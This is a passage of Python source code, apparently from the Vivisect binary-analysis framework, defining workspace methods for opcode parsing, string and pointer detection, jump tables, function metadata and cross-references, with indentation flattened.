workspace object.
"""
uname = e_config.getusername()
self.server = remotevw
self.rchan = remotevw.createEventChannel()
self.server.vprint('%s connecting...' % uname)
wsevents = self.server.exportWorkspace()
self.importWorkspace(wsevents)
self.server.vprint('%s connection complete!' % uname)
thr = threading.Thread(target=self._clientThread)
thr.setDaemon(True)
thr.start()
def _clientThread(self):
"""
The thread that monitors events on a server to stay
in sync.
"""
if self.server is None:
raise Exception("_clientThread() with no server?!?!")
while self.server is not None:
event, einfo = self.server.waitForEvent(self.rchan)
self._fireEvent(event, einfo, local=True)
def waitForEvent(self, chanid, timeout=None):
"""
Return an event,eventinfo tuple.
"""
q = self.chan_lookup.get(chanid)
if q is None:
raise Exception("Invalid Channel")
return q.get(timeout=timeout)
def deleteEventChannel(self, chanid):
"""
Remove a previously allocated event channel from
the workspace.
"""
self.chan_lookup.pop(chanid)
def reprPointer(vw, va):
"""
Do your best to create a humon readable name for the
value of this pointer.
note: This differs from parent function from envi.cli:
* Locations database is checked
* Strings are returned, not named (partially)
* <function> + 0x<offset> is returned if inside a function
* <filename> + 0x<offset> is returned instead of loc_#####
"""
if va == 0:
return "NULL"
loc = vw.getLocation(va)
if loc is not None:
locva, locsz, lt, ltinfo = loc
if lt in (LOC_STRING, LOC_UNI):
return vw.reprVa(locva)
mbase, msize, mperm, mfile = vw.getMemoryMap(va)
ret = mfile + " + 0x%x" % (va - mbase)
sym = vw.getName(va, smart=True)
if sym is not None:
ret = sym
return ret
def reprVa(self, va):
"""
A quick way for scripts to get a string for a given virtual address.
"""
loc = self.getLocation(va)
if loc is not None:
return self.reprLocation(loc)
return "None"
def reprLocation(self, loctup):
if loctup is None:
return 'no loc info'
lva,lsize,ltype,tinfo = loctup
if ltype == LOC_OP:
op = self.parseOpcode(lva, arch=tinfo & envi.ARCH_MASK)
return repr(op)
elif ltype == LOC_STRING:
return repr(self.readMemory(lva, lsize).decode('utf-8'))
elif ltype == LOC_UNI:
# FIXME super ghetto "simple" unicode handling for now
bytes = b''.join(self.readMemory(lva, lsize).split(b'\x00'))
try:
return f"u'%s'" % bytes.decode('utf-8')
except:
return bytes.hex()
elif ltype == LOC_STRUCT:
lstruct = self.getStructure(lva, tinfo)
return repr(lstruct)
elif ltype == LOC_NUMBER:
value = self.parseNumber(lva, lsize)
hexstr = "0x%%.%dx" % lsize
hexstr = hexstr % value
if lsize == 1:
return "BYTE: %d (%s)" % (value, hexstr)
else:
return "%d BYTES: %d (%s)" % (lsize, value, hexstr)
elif ltype == LOC_IMPORT:
return "IMPORT: %s" % tinfo
elif ltype == LOC_POINTER:
return "PTR: %s" % self.arch.pointerString(self.getXrefsFrom(lva)[0][XR_TO])
else:
n = self.getName(lva)
if n is not None:
return n
return e_common.hexify(self.readMemory(lva, lsize))
def followPointer(self, va):
"""
Do pointer analysis and folllow up the recomendation
by creating locations etc...
"""
ltype = self.analyzePointer(va)
if ltype is None:
return False
# Note, we only implement the types possibly
# returned from analyzePointer...
if ltype == LOC_OP:
# NOTE: currently analyzePointer returns LOC_OP
# based on function entries, lets make a func too...
logger.debug('discovered new function (followPointer(0x%x))', va)
self.makeFunction(va)
return True
elif ltype == LOC_STRING:
self.makeString(va)
return True
elif ltype == LOC_UNI:
self.makeUnicode(va)
return True
return False
def processEntryPoints(self):
'''
Roll through EntryPoints and make them into functions (if not already)
'''
for eva in self.getEntryPoints():
if self.isFunction(eva):
continue
if not self.probeMemory(eva, 1, e_mem.MM_EXEC):
continue
logger.debug('processEntryPoint: 0x%x', eva)
self.makeFunction(eva)
def analyze(self):
"""
Call this to ask any available analysis modules
to do their thing...
"""
self.vprint('Beginning analysis...')
starttime = time.time()
# Now lets engage any analysis modules. If any modules return
# true, they managed to change things and we should run again...
for mname in self.amodlist:
mod = self.amods.get(mname)
self.vprint("Extended Analysis: %s" % mod.__name__)
try:
mod.analyze(self)
except Exception as e:
self.vprint("Extended Analysis Exception %s: %s" % (mod.__name__, e))
endtime = time.time()
self.vprint('...analysis complete! (%d sec)' % (endtime-starttime))
self.printDiscoveredStats()
self._fireEvent(VWE_AUTOANALFIN, (endtime, starttime))
def analyzeFunction(self, fva):
for fmname in self.fmodlist:
fmod = self.fmods.get(fmname)
try:
fmod.analyzeFunction(self, fva)
except Exception as e:
self.vprint("Function Analysis Exception for function 0x%x, module: %s" % (fva, fmod.__name__))
self.vprint("Exception Traceback: %s" % traceback.format_exc())
self.setFunctionMeta(fva, "%s fail" % fmod.__name__, traceback.format_exc())
def getStats(self):
stats = {
'functions': len(self.funcmeta),
'relocations': len(self.relocations),
}
return stats
def printDiscoveredStats(self):
(disc,
undisc,
numXrefs,
numLocs,
numFuncs,
numBlocks,
numOps,
numUnis,
numStrings,
numNumbers,
numPointers,
numVtables) = self.getDiscoveredInfo()
percentage = disc*100.0/(disc+undisc) if disc or undisc else 0
self.vprint("Percentage of discovered executable surface area: %.1f%% (%s / %s)" % (percentage, disc, disc+undisc))
self.vprint(" Xrefs/Blocks/Funcs: (%s / %s / %s)" % (numXrefs, numBlocks, numFuncs))
self.vprint(" Locs, Ops/Strings/Unicode/Nums/Ptrs/Vtables: (%s: %s / %s / %s / %s / %s / %s)" % (numLocs, numOps, numStrings, numUnis, numNumbers, numPointers, numVtables))
def getDiscoveredInfo(self):
"""
Returns tuple of ( bytes_with_locations, bytes_without_locations ) for all executable maps.
"""
disc = 0
undisc = 0
for mva, msz, mperms, mname in self.getMemoryMaps():
if not self.isExecutable(mva):
continue
off = 0
while off < msz:
loc = self.getLocation(mva+off)
if loc is None:
off += 1
undisc += 1
else:
off += loc[L_SIZE]
disc += loc[L_SIZE]
numXrefs = len(self.getXrefs())
numLocs = len(self.getLocations())
numFuncs = len(self.getFunctions())
numBlocks = len(self.getCodeBlocks())
numOps = len(self.getLocations(LOC_OP))
numUnis = len(self.getLocations(LOC_UNI))
numStrings = len(self.getLocations(LOC_STRING))
numNumbers = len(self.getLocations(LOC_NUMBER))
numPointers = len(self.getLocations(LOC_POINTER))
numVtables = len(self.getLocations(LOC_VFTABLE))
return disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps, numUnis, numStrings, numNumbers, numPointers, numVtables
def getImports(self):
"""
Return a list of imports, including delay imports, in location tuple format.
"""
return list(self.getLocations(LOC_IMPORT))
def makeImport(self, va, libname, impname):
"""
Add an import entry.
"""
if libname != '*':
libname = self.normFileName(libname)
tinfo = "%s.%s" % (libname, impname)
self.makeName(va, "%s_%.8x" % (tinfo, va))
return self.addLocation(va, self.psize, LOC_IMPORT, tinfo=tinfo)
def getExports(self):
"""
Return a list of exports in (va,etype,name,filename) tuples.
"""
return list(self.exports)
def addExport(self, va, etype, name, filename, makeuniq=False):
"""
Add an already created export object.
makeuniq allows Vivisect to append some number to make the name unique.
This behavior allows for colliding names (eg. different versions of a function)
to coexist in the same workspace.
"""
rname = "%s.%s" % (filename,name)
# check if it exists and is *not* what we're trying to make it
curval = self.vaByName(rname)
if curval is not None and curval != va and not makeuniq:
# if we don't force it to make a uniq name, bail
raise Exception("Duplicate Name: %s => 0x%x (cur: 0x%x)" % (rname, va, curval))
rname = self.makeName(va, rname, makeuniq=makeuniq)
self._fireEvent(VWE_ADDEXPORT, (va,etype,name,filename))
def getExport(self, va):
"""
Get a reference to the export object at the given va
(or none).
"""
return self.exports_by_va.get(va)
def findPointers(self, cache=True):
"""
Search through all currently "undefined" space and see
if you can find pointers there... Returns a list of tuples
where the tuple is (<ptr at>,<pts to>).
"""
align = self.arch.archGetPointerAlignment()
if cache:
ret = self.getTransMeta('findPointers')
if ret is not None:
# Filter locations added since last run...
ret = [(va, x) for (va, x) in ret if self.getLocation(va) is None and not (va % align)]
self.setTransMeta('findPointers', ret)
return ret
ret = []
size = self.psize
for mva, msize, mperm, mname in self.getMemoryMaps():
offset, bytes = self.getByteDef(mva)
maxsize = len(bytes) - size
# if our memory map is not starting off aligned appropriately
if offset % align:
offset &= -align
offset += align
while offset + size < maxsize:
va = mva + offset
loctup = self.getLocation(va)
if loctup is not None:
offset += loctup[L_SIZE]
if offset % align:
offset += align
offset &= -align
continue
x = e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
if self.isValidPointer(x):
ret.append((va, x))
offset += size
continue
offset += align
offset &= -align
if cache:
self.setTransMeta('findPointers', ret)
return ret
def detectString(self, va):
'''
If the address appears to be the start of a string, then
return the string length in bytes, else return -1.
'''
plen = 0 # pascal string length
dlen = 0 # delphi string length
left = self.getMemoryMap(va-4)
# DEV: Make sure there's space left in the map
if self.isReadable(va-4) and left and (left[MAP_VA] + left[MAP_SIZE] - va + 4) >= 4:
plen = self.readMemValue(va - 2, 2) # pascal string length
dlen = self.readMemValue(va - 4, 4) # delphi string length
offset, bytez = self.getByteDef(va)
maxlen = len(bytez) - offset
count = 0
while count < maxlen:
# If we hit another thing, then probably not.
# Ignore when count==0 so detection can check something
# already set as a location.
if count > 0:
loc = self.getLocation(va+count)
if loc is not None:
if loc[L_LTYPE] == LOC_STRING:
if loc[L_VA] == va:
return loc[L_SIZE]
if bytez[offset+count] != 0:
# we probably hit a case where the string at the lower va is
# technically the start of the full string, but the binary does
# some optimizations and just ref's inside the full string to save
# some space
return count + loc[L_SIZE]
return loc[L_VA] - (va + count) + loc[L_SIZE]
return -1
c = bytez[offset+count]
# The "strings" algo basically says 4 or more...
if c == 0 and count >= 4:
return count
elif c == 0 and (count == dlen or count == plen):
return count
if chr(c) not in string.printable:
return -1
count += 1
return -1
def isProbablyString(self, va):
if self.detectString(va) > 0 :
return True
return False
def detectUnicode(self, va):
'''
If the address appears to be the start of a unicode string, then
return the string length in bytes, else return -1.
This will return true if the memory location is likely
*simple* UTF16-LE unicode (<ascii><0><ascii><0><0><0>).
'''
# FIXME this does not detect Unicode...
offset, bytes = self.getByteDef(va)
maxlen = len(bytes) - offset
count = 0
if maxlen < 2:
return -1
charset = bytes[offset + 1]
while count < maxlen:
# If we hit another thing, then probably not.
# Ignore when count==0 so detection can check something
# already set as a location.
if (count > 0):
loc = self.getLocation(va+count)
if loc:
if loc[L_LTYPE] == LOC_UNI:
if loc[L_VA] == va:
return loc[L_SIZE]
if bytes[offset+count] != 0:
# same thing as in the string case, a binary can ref into a string
# only part of the full string.
return count + loc[L_SIZE]
return loc[L_VA] - (va + count) + loc[L_SIZE]
return -1
c0 = bytes[offset+count]
if offset + count+1 >= len(bytes):
return -1
c1 = bytes[offset+count+1]
# If we find our null terminator after more
# than 4 chars, we're probably a real string
if c0 == 0:
if count > 8:
return count
return -1
# If the first byte char isn't printable, then
# we're probably not a real "simple" ascii string
if chr(c0) not in string.printable:
return -1
# If it's not null,char,null,char then it's
# not simple unicode...
if c1 != charset:
return -1
count += 2
return -1
def isProbablyUnicode(self, va):
if self.detectUnicode(va) > 0 :
return True
return False
def isProbablyCode(self, va, **kwargs):
"""
Most of the time, absolute pointers which point to code
point to the function entry, so test it for the sig.
"""
if not self.isExecutable(va):
return False
ret = self.isFunctionSignature(va)
if ret:
return ret
rerun = kwargs.pop('rerun', False)
if va in self.iscode and not rerun:
return self.iscode[va]
self.iscode[va] = True
# because we're doing partial emulation, demote some of the logging
# messages to low priority.
kwargs['loglevel'] = e_common.EMULOG
emu = self.getEmulator(**kwargs)
wat = v_emucode.watcher(self, va)
emu.setEmulationMonitor(wat)
try:
emu.runFunction(va, maxhit=1)
except Exception as e:
self.iscode[va] = False
return False
if wat.looksgood():
self.iscode[va] = True
else:
self.iscode[va] = False
return self.iscode[va]
#################################################################
#
# Opcode API
#
def parseOpcode(self, va, arch=envi.ARCH_DEFAULT, skipcache=False):
'''
Parse an opcode from the specified virtual address.
Example: op = m.parseOpcode(0x7c773803, skipcache=True)
Set skipcache=True in order to bypass the opcode cache and force a reparsing of bytes
'''
off, b = self.getByteDef(va)
if arch == envi.ARCH_DEFAULT:
loctup = self.getLocation(va)
# XXX - in the case where we've set a location on what should be an
# opcode lets make sure L_LTYPE == LOC_OP if not lets reset L_TINFO = original arch param
# so that at least parse opcode wont fail
if loctup is not None and loctup[L_TINFO] and loctup[L_LTYPE] == LOC_OP:
arch = loctup[L_TINFO]
if not skipcache:
key = (va, arch, b[:16])
valu = self._op_cache.get(key, None)
if not valu:
valu = self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va)
self._op_cache[key] = valu
return valu
return self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va)
def clearOpcache(self):
'''
Remove all elements from the opcode cache
'''
self._op_cache.clear()
def iterJumpTable(self, startva, step=None, maxiters=None, rebase=False):
if not step:
step = self.psize
fname = self.getMemoryMap(startva)
if fname is None:
return
fname = fname[3]
imgbase = self.getFileMeta(fname, 'imagebase')
iters = 0
ptrbase = startva
rdest = self.readMemValue(ptrbase, step)
if rebase and rdest < imgbase:
rdest += imgbase
while self.isValidPointer(rdest) and self.isProbablyCode(rdest):
if self.analyzePointer(ptrbase) in STOP_LOCS:
break
yield rdest
ptrbase += step
if len(self.getXrefsTo(ptrbase)):
break
rdest = self.readMemValue(ptrbase, step)
if rebase and rdest < imgbase:
rdest += imgbase
iters += 1
if maxiters is not None and iters >= maxiters:
break
def moveCodeBlock(self, cbva, newfva):
cb = self.getCodeBlock(cbva)
if cb is None:
return
if cb[CB_FUNCVA] == newfva:
return
self.delCodeBlock(cb)
self.addCodeBlock((cb[CB_VA], cb[CB_SIZE], newfva))
def splitJumpTable(self, callingVa, prevRefVa, newTablAddr, rebase=False, psize=4):
'''
So we have the case where if we have two jump tables laid out consecutively in memory (let's
call them tables Foo and Bar, with Foo coming before Bar), and we see Foo first, we're going to
recognize Foo as being a giant table, with all of Bar overlapping with Foo
So we need to construct a list of now invalid references from prevRefVa, starting at newTablAddr
newTablAddr should point to the new jump table, and those new codeblock VAs should be removed from
the list of references that prevRefVa refs to (and delete the name)
We also need to check to see if the functions themselves line up (ie, do these two jump tables
even belong to the same function, or should we remove the code block from the function entirely?)
'''
# Due to how codeflow happens, we have no guarantee if these two adjacent jump tables are
# even in the same function
codeblocks = set()
curfva = self.getFunction(callingVa)
# collect all the entries for the new jump table
for cb in self.iterJumpTable(newTablAddr, rebase=rebase, step=psize):
if cb in codeblocks:
continue
codeblocks.add(cb)
prevcb = self.getCodeBlock(cb)
if prevcb is None:
continue
# we may also have to break these codeblocks from the old function
# 1 -- new func is none, old func is none
# * can't happen. if the codeblock is defined, we at least have an old function
# 2 -- new func is not none, old func is none
# * Can't happen. see above
# 3 -- new func is none, old func is not none
# * delete the codeblock. we've dropped into a new function that is different from the old
# since how codeflow discover functions, we should have all the code blocks for function
# 4 -- neither are none
# * moveCodeBlock -- that func will handle whether or not functions are the same
if curfva is not None:
self.moveCodeBlock(cb, curcb[CB_FUNCVA])
else:
self.delCodeBlock(prevcb[CB_VA])
# now delete those entries from the previous jump table
oldrefs = self.getXrefsFrom(prevRefVa)
todel = [xref for xref in self.getXrefsFrom(prevRefVa) if xref[1] in codeblocks]
for va in todel:
self.setComment(va[1], None)
self.delXref(va)
def makeJumpTable(self, op, tova, rebase=False, psize=4):
fname = self.getFileByVa(tova)
imgbase = self.getFileMeta(fname, 'imagebase')
ptrbase = tova
rdest = self.readMemValue(ptrbase, psize)
if rebase and rdest < imgbase:
rdest += imgbase
# if there's already an Xref to this address from another jump table, we overshot
# the other table, and need to cut that one short, delete its Xrefs starting at this one
# and then let the rest of this function build the new jump table
# This jump table also may not be in the same function as the other jump table, so we need
# to remove those codeblocks (and child codeblocks) from this function
# at this point, rdest should be the first codeblock in the jumptable, so get all the xrefs to him
# (but skipping over the current jumptable base address we're looking at)
for xrfrom, xrto, rtype, rflags in self.getXrefsTo(rdest):
if tova == xrfrom:
continue
refva, refsize, reftype, refinfo = self.getLocation(xrfrom)
if reftype != LOC_OP:
continue
# If we've already constructed this opcode location and made the xref to the new codeblock,
# that should mean we've already made the jump table, so there should be no need to split this
# jump table.
if refva == op.va:
continue
refop = self.parseOpcode(refva)
for refbase, refbflags in refop.getBranches():
if refbflags & envi.BR_TABLE:
self.splitJumpTable(op.va, refva, tova, psize=psize)
tabdone = {}
for i, rdest in enumerate(self.iterJumpTable(ptrbase, rebase=rebase, step=psize)):
if not tabdone.get(rdest):
tabdone[rdest] = True
self.addXref(op.va, rdest, REF_CODE, envi.BR_COND)
if self.getName(rdest) is None:
self.makeName(rdest, "case%d_%.8x" % (i, op.va))
else:
cmnt = self.getComment(rdest)
if cmnt is None:
self.setComment(rdest, "Other Case(s): %d" % i)
else:
cmnt += ", %d" % i
self.setComment(rdest, cmnt)
# This must be second (len(xrefsto))
self.addXref(op.va, tova, REF_PTR)
def makeOpcode(self, va, op=None, arch=envi.ARCH_DEFAULT):
"""
Create a single opcode location. If you have already parsed the
opcode object, you may pass it in.
"""
if op is None:
try:
op = self.parseOpcode(va, arch=arch)
except envi.InvalidInstruction as msg:
# FIXME something is just not right about this...
bytez = self.readMemory(va, 16)
logger.warning("Invalid Instruct Attempt At:", hex(va), e_common.hexify(bytez))
raise InvalidLocation(va, msg)
except Exception as msg:
raise InvalidLocation(va, msg)
# Add our opcode location first (op flags become ldata)
loc = self.addLocation(va, op.size, LOC_OP, op.iflags)
# This takes care of all normal indirect immediates
brdone = {}
brlist = op.getBranches()
for tova, bflags in brlist:
# If there were unresolved dynamic branches, oh well...
if tova is None:
continue
if not self.isValidPointer(tova):
continue
brdone[tova] = True
# Special case, if it's a table branch, lets resolve it now.
if bflags & envi.BR_TABLE:
self.makeJumpTable(op, tova)
elif bflags & envi.BR_DEREF:
self.addXref(va, tova, REF_DATA)
ptrdest = None
if self.getLocation(tova) is None:
ptrdest = self.makePointer(tova, follow=False)
# If the actual dest is executable, make a code ref fixup
# which *removes* the deref flag...
# If we're an xref to something real, rip out the deref flag, but if we're
# an xref to a big fat 0, fuggedaboutit
if ptrdest and self.analyzePointer(ptrdest[0]):
self.addXref(va, ptrdest[0], REF_CODE, bflags & ~envi.BR_DEREF)
else:
self.addXref(va, tova, REF_CODE, bflags)
else:
# vivisect does NOT create REF_CODE entries for
# instruction fall through
if bflags & envi.BR_FALL:
continue
self.addXref(va, tova, REF_CODE, bflags)
# Check the instruction for static d-refs
for oidx, o in op.genRefOpers(emu=None):
# FIXME it would be nice if we could just do this one time
# in the emulation pass (or hint emulation that some have already
# been done.
# unfortunately, emulation pass only occurs for code identified
# within a marked function.
# future fix: move this all into VivCodeFlowContext.
# Does the operand touch memory ?
if o.isDeref():
ref = o.getOperAddr(op, None)
if brdone.get(ref, False):
continue
if ref is not None and self.isValidPointer(ref):
# It's a data reference. lets also check if the data is
# a pointer.
self.addXref(va, ref, REF_DATA)
# If we don't already know what type this location is,
# lets make it either a pointer or a number...
if self.getLocation(ref) is None:
self.guessDataPointer(ref, o.tsize)
else:
ref = o.getOperValue(op)
if brdone.get(ref, False):
continue
if ref is not None and type(ref) is int and self.isValidPointer(ref):
self.addXref(va, ref, REF_PTR)
return loc
def _dbgLocEntry(self, va):
"""
Display the human-happy version of a location
"""
loc = self.getLocation(va)
if loc is None:
return 'None'
lva, lsz, ltype, ltinfo = loc
ltvar = loc_lookups.get(ltype)
ltdesc = loc_type_names.get(ltype)
locrepr = '(0x%x, %d, %s, %r) # %s' % (lva, lsz, ltvar, ltinfo, ltdesc)
return locrepr
def updateCallsFrom(self, fva, ncalls):
function = self.getFunction(fva)
prev_call = self.getFunctionMeta(function, 'CallsFrom')
newcall = set(prev_call).union(set(ncalls))
self.setFunctionMeta(function, 'CallsFrom', list(newcall))
def makeCode(self, va, arch=envi.ARCH_DEFAULT, fva=None):
"""
Attempt to begin code-flow based disassembly by
starting at the given va. The va will be made into
an OpcodeLoc and refs will be walked continuing to
make code where possible.
"""
# If this is already a location, bail.
if self.isLocation(va):
return
calls_from = self.cfctx.addCodeFlow(va, arch=arch)
if fva is None:
self.setVaSetRow('CodeFragments', (va, calls_from))
else:
self.updateCallsFrom(fva, calls_from)
return calls_from
def previewCode(self, va, arch=envi.ARCH_DEFAULT):
'''
Show the repr of an instruction in the current canvas *before* making it that
'''
try:
op = self.parseOpcode(va, arch)
if op is None:
self.vprint("0x%x - None")
else:
self.vprint("0x%x (%d bytes) %s" % (va, len(op), repr(op)))
except Exception:
self.vprint("0x%x - decode exception" % va)
logger.exception("preview opcode exception:")
#################################################################
#
# Function API
#
def isFunction(self, funcva):
"""
Return True if funcva is a function entry point.
"""
return self.funcmeta.get(funcva) is not None
def isFunctionThunk(self, funcva):
"""
Return True if funcva is a function thunk
"""
# TODO: could we do more here?
try:
return self.getFunctionMeta(funcva, 'Thunk') is not None
except InvalidFunction:
return False
def getFunctions(self):
"""
Return a list of the function virtual addresses
defined in the workspace.
"""
return list(self.funcmeta.keys())
def getFunction(self, va):
"""
Return the VA for this function. This will search code blocks
and check for a function va.
"""
if self.funcmeta.get(va) is not None:
return va
cbtup = self.getCodeBlock(va)
if cbtup is not None:
return cbtup[CB_FUNCVA]
return None
def makeFunction(self, va, meta=None, arch=envi.ARCH_DEFAULT):
"""
Do parsing for function information and add a new function doodad.
This function should probably only be called once code-flow for the
area is complete.
"""
logger.debug('makeFunction(0x%x, %r, 0x%x)', va, meta, arch)
if self.isFunction(va):
logger.debug('0x%x is already a function, skipping', va)
return
if not self.isValidPointer(va):
raise InvalidLocation(va)
loc = self.getLocation(va)
if loc is not None and loc[L_TINFO] is not None and loc[L_LTYPE] == LOC_OP:
arch = loc[L_TINFO]
realfva = self.cfctx.addEntryPoint(va, arch=arch)
if meta is not None:
for key, val in meta.items():
self.setFunctionMeta(realfva, key, val)
return realfva
def delFunction(self, funcva):
"""
Remove a function, it's code blocks and all associated meta
"""
if self.funcmeta.get(funcva) is None:
raise InvalidLocation(funcva)
self._fireEvent(VWE_DELFUNCTION, funcva)
def setFunctionArg(self, fva, idx, atype, aname):
'''
Set the name and type information for a single function arguemnt by index.
Example:
# If we were setting up main...
vw.setFunctionArg(fva, 0, 'int','argc')
vw.setFunctionArg(fva, 1, 'char **','argv')
'''
rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva)
while len(callargs) <= idx:
callargs.append( ('int','arg%d' % len(callargs)) )
callargs[idx] = (atype,aname)
self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs))
def getFunctionArgs(self, fva):
'''
Returns the list of (typename,argname) tuples which define the
arguments for the specified function.
Example:
for typename,argname in vw.getFunctionArgs(fva):
print('Takes: %s %s' % (typename,argname))
'''
rettype, retname, callconv, callname, callargs = self.getFunctionApi(fva)
return list(callargs)
def getFunctionApi(self, fva):
'''
Retrieve the API definition for the given function address.
Returns: an API tuple (similar to impapi subsystem) or None
( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
'''
ret = self.getFunctionMeta(fva, 'api')
if ret is not None:
return ret
defcall = self.getMeta('DefaultCall','unkcall')
return ('void', None, defcall, None, ())
def setFunctionApi(self, fva, apidef):
'''
Set a function's API definition.
NOTE: apidef is a tuple similar to the impapi subsystem
( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
Example:
apidef = ('int','size','stdcall','getThingSize', ( ('void *','thing'), ))
vw.setFunctionApi(fva, apidef)
'''
self.setFunctionMeta(fva, 'api', apidef)
def getFunctionLocals(self, fva):
'''
Retrieve the list of (fva,spdelta,symtype,syminfo) tuples which
represent the given function's local memory offsets.
'''
if not self.isFunction(fva):
raise InvalidFunction(fva)
return list(self.localsyms[fva].values())
def getFunctionLocal(self, fva, spdelta):
'''
Retrieve a function local symbol definition as a
(typename,symname) tuple or None if not found.
NOTE: If the local symbol references a LSYM_FARG, this API
will resolve the argument name/type from the function API
definition.
Example:
locsym = vw.getFunctionLocal(fva, 8)
if locsym:
symtype,symname = locsym
print('%s %s;' % (symtype,symname))
'''
locsym = self.localsyms[fva].get(spdelta)
if locsym is None:
return None
fva,spdelta,symtype,syminfo = locsym
if symtype == LSYM_NAME:
return syminfo
if symtype == LSYM_FARG:
apidef = self.getFunctionApi(fva)
if apidef is None:
return None
funcargs = apidef[-1]
if syminfo >= len(funcargs):
return None
return funcargs[syminfo]
raise Exception('Unknown Local Symbol Type: %d' % symtype)
def setFunctionLocal(self, fva, spdelta, symtype, syminfo):
'''
Assign a local symbol within a function (addressed
by delta from initial sp). For each symbol, a "symtype"
and "syminfo" field are used to specify the details.
Example:
# Setup a regular local integer
vw.setFunctionLocal(fva, -4, LSYM_NAME, ('int','x'))
# Setup a link to a stack argument... (ie. i386 cdecl)
vw.setFunctionLocal(fva, 4, LSYM_FARG, 0)
# Setup amd64 style shadow space
vw.setFunctionLocal(fva, 8, LSYM_NAME, ('void *','shadow0'))
'''
metaname = 'LocalSymbol:%d' % spdelta
metavalue = (fva,spdelta,symtype,syminfo)
self.setFunctionMeta(fva, metaname, metavalue)
def setFunctionMeta(self, funcva, key, value):
"""
Set meta key,value pairs that describe a particular
function (by funcva).
Example: vw.setFunctionMeta(fva, "WootKey", 10)
"""
if not self.isFunction(funcva):
raise InvalidFunction(funcva)
self._fireEvent(VWE_SETFUNCMETA, (funcva, key, value))
def getFunctionMeta(self, funcva, key, default=None):
m = self.funcmeta.get(funcva)
if m is None:
raise InvalidFunction(funcva)
return m.get(key, default)
def getFunctionMetaDict(self, funcva):
"""
Return the entire dictionary of function metadata
for the function specified at funcva
"""
return self.funcmeta.get(funcva)
def getFunctionBlocks(self, funcva):
"""
Return the code-block objects for the given function va
"""
ret = self.codeblocks_by_funcva.get(funcva)
if ret is None:
ret = []
return ret
def makeFunctionThunk(self, fva, thname, addVa=True, filelocal=False):
"""
Inform the workspace that a given function is considered a "thunk" to another.
This allows the workspace to process argument inheritance and several other things.
Usage: vw.makeFunctionThunk(0xvavavava, "kernel32.CreateProcessA")
"""
self.checkNoRetApi(thname, fva)
self.setFunctionMeta(fva, "Thunk", thname)
n = self.getName(fva)
base = thname.split(".")[-1]
if addVa:
name = "%s_%.8x" % (base,fva)
else:
name = base
newname = self.makeName(fva, name, filelocal=filelocal, makeuniq=True)
api = self.getImpApi(thname)
if api:
# Set any argument names that are None
rettype,retname,callconv,callname,callargs = api
callargs = [ callargs[i] if callargs[i][1] else (callargs[i][0],'arg%d' % i) for i in range(len(callargs)) ]
self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs))
def getCallers(self, va):
'''
Get the va for all the callers of the given function/import.
Example:
for va in vw.getCallers( importva ):
dostuff(va)
'''
ret = []
for fromva, tova, rtype, rflags in self.getXrefsTo(va, rtype=REF_CODE):
if rflags & envi.BR_PROC:
ret.append(fromva)
return ret
def getCallGraph(self):
'''
Retrieve a visgraph Graph object representing all known inter procedural
branches in the workspace. Each node has an ID that is the same as the
function va.
Example:
graph = vw.getCallGraph()
'''
return self._call_graph
def getFunctionGraph(self, fva):
'''
Retrieve a code-block graph for the specified virtual address.
Procedural branches (ie, calls) will not be followed during graph
construction.
'''
return viv_codegraph.FuncBlockGraph(self,fva)
def getImportCallers(self, name):
"""
Get a list of all the callers who reference the specified import
by name. (If we detect that the name is actually *in* our workspace,
return those callers too...
"""
ret = []
# If it's a local function, do that too..
fva = self.vaByName(name)
if fva is not None and self.isFunction(fva):
ret = self.getCallers(fva)
for fva in self.getFunctions():
if self.getFunctionMeta(fva, 'Thunk') == name:
ret.extend( self.getCallers( fva ) )
for lva,lsize,ltype,tinfo in self.getLocations(LOC_IMPORT):
if tinfo == name:
ret.extend( self.getCallers( lva ) )
return ret
#################################################################
#
# Xref API
#
def getXrefs(self, rtype=None):
"""
Return the entire list of XREF tuples for this workspace.
"""
if rtype:
return [ xtup for xtup in self.xrefs if xtup[XR_RTYPE] == rtype ]
return self.xrefs
def getXrefsFrom(self, va, rtype=None):
"""
Return a list of tuples for the xrefs whose origin is the
specified va. Optionally, only return xrefs whose type
field is rtype if specified.
example:
for fromva, tova, rtype, rflags in vw.getXrefsFrom(0x41414141):
dostuff(tova)
"""
ret = []
xrefs = self.xrefs_by_from.get(va, None)
if xrefs is None:
return ret
if rtype is None:
return xrefs
return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ]
def getXrefsTo(self, va, rtype=None):
"""
Get a list of xrefs which point to the given va. Optionally,
specify an rtype to get only xrefs of that type.
"""
# FIXME make xrefs use MapLookup!
ret = []
xrefs = self.xrefs_by_to.get(va, None)
if xrefs is None:
return ret
if rtype is None:
return xrefs
return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ]
def addMemoryMap(self, va, perms, fname, bytes, align=None):
"""
Add a memory map to the workspace. This is the *only* way to
get memory backings into the workspace.
"""
self._fireEvent(VWE_ADDMMAP, (va, perms, fname, bytes, align))
# since we don't return anything from _fireEvent(), pull the new info:
mva, msz, mperm, mbytes = self.getMemoryMap(va)
return msz
def delMemoryMap(self, mapva):
'''
Remove a memory map from the workspace.
'''
self._fireEvent(VWE_DELMMAP, mapva)
def addSegment(self, va, size, name, filename):
"""
Add a "segment" to the workspace. A segment is generally some meaningful
area inside of a memory map. For PE binaries, a segment and a memory map
are synonymous. However, some platforms (Elf) specify their memory maps
(program headers) and segments (sectons) seperately.
"""
self._fireEvent(VWE_ADDSEGMENT, (va,size,name,filename))
def getSegment(self, va):
"""
Return the tuple representation of a segment. With the
following format:
(va, size, name, filename)
"""
for seg in self.segments:
sva, ssize, sname, sfile = seg
if va >= sva and va < (sva + ssize):
return seg
return None
def getSegments(self):
"""
Return a list of segment tuples (see getSegment) for all
the segments defined in the current worksace
"""
return list(self.segments)
def addCodeBlock(self, va, size, funcva):
"""
Add a region of code which belongs to a function. Code-block boundaries
are at all logical branches and have more in common with a logical
graph view than function chunks.
"""
loc = self.getLocation( va )
if loc is None:
raise Exception('Adding Codeblock on *non* location?!?: 0x%.8x' % va)
self._fireEvent(VWE_ADDCODEBLOCK, (va,size,funcva))
def getCodeBlock(self, va):
"""
